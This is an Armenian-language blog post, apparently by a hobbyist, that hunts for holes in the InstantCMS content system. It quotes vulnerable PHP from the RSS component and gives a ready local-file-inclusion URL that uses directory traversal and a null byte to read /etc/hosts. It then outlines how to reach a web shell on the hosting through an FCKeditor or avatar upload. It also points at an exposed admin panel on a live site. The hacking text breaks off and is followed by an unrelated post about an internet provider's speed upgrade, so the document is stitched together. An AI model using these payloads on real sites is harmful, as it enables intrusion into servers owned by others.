Եվ ահա այդ շատ ցանկացողների համար էլ ստեղված է մի համակարգ (այսուհետ կանվանեմ սկրիպտ), որը կոչվում է InstantCMS: Գուցե շատերին անունը ոչինչ չասեց, բայց որոշներին հաստատ ծանոթ սկրիպտ է: Փորձեմ այսօր անդրադառնալ այս սկրիպտի թերություններին:

ՆԱԽԱՀԱՐՁԱԿՈՒՄ

Ահա գտել եմ այդ սկրիպտով աշխատող ինչ-որ կայք, որի բախտը ցավոք չի բերել: Հիմա կփորձենք ստուգել…

Առաջինը, որ աչքի ընկավ, Ադմինիստրացիոն բաժնի ակներև տեղադրություն էր` http://badsite.com/admin : Ոնց էլ չլինի, եթե ուրիշ բան չգտնեմ, էտ հաստատ ասելու բանա… Ու քանի գնում ավելի էր ձգում ինձ սկրպիտը…

Գուգլն ինձ ասաց, որ սկրիպտի պաշտոնական սայթը instantcms.ru-ն էր… Ես էլ գնացի ու … 2 Մեգաբիթանոց կապս սկրիպտը շատ արագ տեղավորեց համակարգչիս կոշտ սկավառակի ամենաակնառու տեղը` ուղիղ էկրանիս…ԻՆՁ ԿԱՆԱՉ ՃԱՆԱՊԱՐՀ

Լոկալ սերվերիս վրա միացրեցի apache-ն ու mysql-ը, սկրիպտը տեղավորեցի համապատասխան տեղում ու սկեսեցի փորփրել կոդը: Առաջինը որ տեսա ու աչքերս փայլատակեցին, դա wysiwyg անունով ֆայլերի արկղն էր (այսուհետ` ֆոլդեր), որի մեջ ինձ քաջ ծանոթ FCKeditor-ը աչքով էր անում, ասում էր “Ես այստեղ եմ…Ա~ու…”: Կհարցնեք ինչի էդքան ուրախացա, կասեմ, որ այդ editor-ն ամենալավ օգնականն է, եթե սկրիպտի մեջ լոկալ ինկլուդի թերություն կա: Ավելի մանրամասն.

http://localhost/wysiwyg/editor/filemanager/connectors/test.html

հասցեում գտնվում է ֆայլ-վերբեռնելու էջը, ու չնայած այն բանի, որ .php, .phtml, .cgi և այլ նմանատիպ ֆորմատներով ֆայլեր չենք կարողանա վերբեռնել, բայց եթե LFI-ն կա, ուրեմն ցանկացած ֆորմատի ֆայլ կարող ենք որպես php-կոդ աշխատեցնել: Բայց հակված եմ ավելի շատ ընդունել, որ նման թերությունը ոչ թե տեստավորվող սկրիպտի, այլ հենց FCKeditor-ի թերությունն է:

Ու քանի որ, ամեն ինչ աշխատում էր mod_rewrite-ով, որոշեցի .htaccess-ի մեջ քիթս խոթել մի քիչ ու գտա հետաքրքիր կոդ`

#COMPONENT "RSS FEEDS"
RewriteRule ^rss/([a-z]*)/(.*)/feed.rss$ /components/rssfeed/frontend.php?&target=$1&item_id=$2

SQL-ինյեկցիա գտնելու հույսով գնացինք ուսումնասիրելու frontend.php-ն: Ներկայացնում եմ կոդ, որը ինձ դուր եկավ առաջին հայացքից.

    if (isset($_REQUEST['do'])){ $do = $_REQUEST['do']; } else { $do = 'rss'; }
    if (isset($_REQUEST['target'])){ $target = $_REQUEST['target']; } else { die(); }
    if (isset($_REQUEST['item_id'])) { $item_id = $_REQUEST['item_id']; } else { die(); }
    .................................................. .....................................
    if ($do=='rss'){
    $rss = '';

    if (file_exists($_SERVER['DOCUMENT_ROOT'].'/components/'.$target.'/prss.php')){

    $inCore->includeFile('components/'.$target.'/prss.php');

Ուռա… $target փոփոխականը Local File Inclusion-ի հարվածի տակ ա … աչքիս… երևի…

Եթե PHP-ի կոնֆիգուրացիայի մեջ magic_quotes_gpc = off պայմանը կա, ուրեմն միանշանակ կարող ենք ցանկացաց ֆայլ ինկլուդ անել ահա այսպես`

http://localhost/components/rssfeed/frontend.php?item_id=1 &target=../../../../../../../../../../../../etc/hosts%00

Դե եթե սրա հետ մեկտեղ հիշենք մի քիչ առաջ ասածս, որ FCKeditor-ի  օգնությամբ կարող ենք վերբեռնել ֆայլը, ուրմեն SHELL-ը հաստատ կուղարկվի հոսթինգ (բայց միմիայն ցանկության դեպքում): Դե իսկ, եթե հանկարծ ադմինիստրատորը editor-ի ֆայլ վեռբեռնելու մասը անջատել է, ծայրահեղ դեպքում կոդ-ավատարը կա ու կա:

…………………..

Հոգնեցի… շարունակությունը մի քիչ հետո կգրեմ….

Ճիշտ ա, մի քիչ քերականորեն սխալ ձևակերպված նախադասություն էր, բայց իմաստն ա կարևոր: Տեղեկացնեմ, որ “FASTCLICK XXL” տարիֆին համապատասխանում է 2048 կբիթ/վրկ download և 512կբիթ/վրկ upload արագությամբ ինտերնետ կապը, այնինչ հիմա ես օգտվում եմ “FASTCLICK L” տարիֆից (512/256), որի համար վճարում եմ ամսեկան 10.000 դրամ: Փաստորեն ամբողջ հունվար ամիսը 10.000 դրամով ես կվայելեմ 2 մեգաբիթանոց արագություն… ՈՒՌԱԱԱԱԱԱԱԱԱԱԱԱԱԱԱ: Էլ չեմ ասում անակնկալ նվերի մասին, որն ի դեպ, ճշտեցի: Նվերս 1GB-անոց ֆլեշ է: Ստեղ են ասել. “Չեղած տեղից բադրջանն էլ ա միրգ”:

Շնորհակալ եմ պրովայդերիս: Մեռնեմ ես իրա ԱՆԿՐԿՆԵԼԻ ջանին:

Հ.Գ. Հենց նոր SPEEDTEST.NET-ը իմ ինտերնետի արագությունը ստուգեց և ինձ տվեց հետևյալ թվերը`

Փաստորեն կապս արդեն արագացրել են… ԵՎՍ ՄԵԿ ԱՆԳԱՄ, ՈՒՌԱԱԱԱԱԱ!!!!